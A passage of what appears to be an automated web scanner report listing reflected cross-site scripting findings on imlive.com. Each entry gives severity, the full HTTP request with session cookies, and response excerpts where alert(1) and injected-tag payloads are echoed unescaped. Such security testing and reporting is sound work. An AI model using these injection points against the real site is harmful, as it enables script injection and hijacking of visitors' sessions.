Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:59 GMT
Connection: close
Content-Length: 21781
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/becomehost.aspx&he=imlive.com&ul=/becomehost.aspx?cbb67'-alert(1)-'15501fee645=1&qs=cbb67'-alert(1)-'15501fee645=1&qs=cbb67'-alert(1)-'15501fee645=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function
...[SNIP]...

4.487. http://imlive.com/categoryfs.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /categoryfs.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1290d'><a>0243a0c9435 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /categoryfs.asp?cat=232&1290d'><a>0243a0c9435=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:30 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:30 GMT
Connection: close
Content-Length: 18966
Vary: Accept-Encoding


<html>
   <head>
       <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
       <title>Find Friends & Romance on Live Webcam Video Chat at ImLive</title>
       <meta name="d
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/categoryfs.asp?cat=232^1290d'><a>0243a0c9435=1&lr=1107816009&ud=0&pe=categoryfs.asp&qs=cat=232^1290d'>
...[SNIP]...

4.488. http://imlive.com/categoryms.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /categoryms.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 61172'><a>3b9652ee722 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /categoryms.asp?cat=2&61172'><a>3b9652ee722=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:32 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:32 GMT
Connection: close
Content-Length: 21858
Vary: Accept-Encoding


<html>
   <head>
       <title>Mysticism & Spirituality Live Video Chat at ImLive</title>
       <META NAME="Description" CONTENT="Live video chat with Mysticism & Spirituality experts. Astrologers, Psychics
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/categoryms.asp?cat=2^61172'><a>3b9652ee722=1&lr=1107816009&ud=0&pe=categoryms.asp&qs=cat=2^61172'>
...[SNIP]...

4.489. http://imlive.com/celebrity-porn-stars/celebrity-events/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /celebrity-porn-stars/celebrity-events/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db582'-alert(1)-'4b3c1d175fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /celebrity-porn-stars/celebrity-events/?db582'-alert(1)-'4b3c1d175fb=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:59 GMT
Connection: close
Content-Length: 2667
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   War
...[SNIP]...
<script type="text/javascript">
function IAgree(){document.location.href='?meAgree=yes&redirect=%2fcelebrity-porn-stars%2fcelebrity-events%2f%3fdb582'-alert(1)-'4b3c1d175fb%3d1'; return false;}
function IDontAgree() { window.parent.location.href = "/"; return false; }
</script>
...[SNIP]...

4.490. http://imlive.com/disclaimer.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /disclaimer.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cd26f'><a>d83acef05af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /disclaimer.asp?cd26f'><a>d83acef05af=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:16 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:16 GMT
Connection: close
Content-Length: 78891
Vary: Accept-Encoding


<html>
   <head>
       <title>Disclaimer - Live Video Chat at ImLive</title>
       
<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/headerguest.css" />

<link rel="stylesheet" typ
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/disclaimer.asp?cd26f'><a>d83acef05af=1&lr=1107816009&ud=0&pe=disclaimer.asp&qs=cd26f'>
...[SNIP]...

4.491. http://imlive.com/forgot.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /forgot.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e80f3'-alert(1)-'c0da0968686 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forgot.aspx?e80f3'-alert(1)-'c0da0968686=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:43 GMT
Connection: close
Content-Length: 3338
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Imlive.com Customer Serv
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/forgot.aspx&he=imlive.com&ul=/forgot.aspx?e80f3'-alert(1)-'c0da0968686=1&qs=e80f3'-alert(1)-'c0da0968686=1&qs=e80f3'-alert(1)-'c0da0968686=1&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function
...[SNIP]...

4.492. http://imlive.com/homepagems3.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /homepagems3.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e62a5"><a>8b3d580d15c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /homepagems3.asp?e62a5"><a>8b3d580d15c=1 HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FL%2bWXDSNB1qb%2fDfrHETDCj1A%3d; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:04:32 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
Set-Cookie: ASPSESSIONIDCARBBRTR=OCAEMBCBLGFDAAHFKEJLGHNK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:04:32 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 10275


<html>
   <head>
       
<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/headerguest.css" />

<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/hostbasic.c
...[SNIP]...
<form onsubmit="return CheckForm(this);" method="post" action="homepagems3.asp?e62a5"><a>8b3d580d15c=1" style="margin:0;" name="frmLogin" ID="frmLogin">
...[SNIP]...

4.493. http://imlive.com/homepagems3.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /homepagems3.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6ef1f'><a>f607da23703 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /homepagems3.asp?6ef1f'><a>f607da23703=1 HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FL%2bWXDSNB1qb%2fDfrHETDCj1A%3d; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:04:48 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
Set-Cookie: ASPSESSIONIDCARBBRTR=DEAEMBCBEHGBLGDACDEEAKAD; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:04:49 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 10275


<html>
   <head>
       
<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/headerguest.css" />

<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/hostbasic.c
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/homepagems3.asp?6ef1f'><a>f607da23703=1&lr=1107816009&ud=0&pe=homepagems3.asp&qs=6ef1f'>
...[SNIP]...

4.494. http://imlive.com/live-sex-chats/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d227'-alert(1)-'63744927c3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/?6d227'-alert(1)-'63744927c3a=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:01 GMT
Connection: close
Content-Length: 40531
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/category.aspx&he=imlive.com&ul=/live-sex-chats/?6d227'-alert(1)-'63744927c3a=1&qs=cat=1&qs=cat=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEve
...[SNIP]...

4.495. http://imlive.com/live-sex-chats/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66ff1"><a>7cdd9e5718 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/?66ff1"><a>7cdd9e5718=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
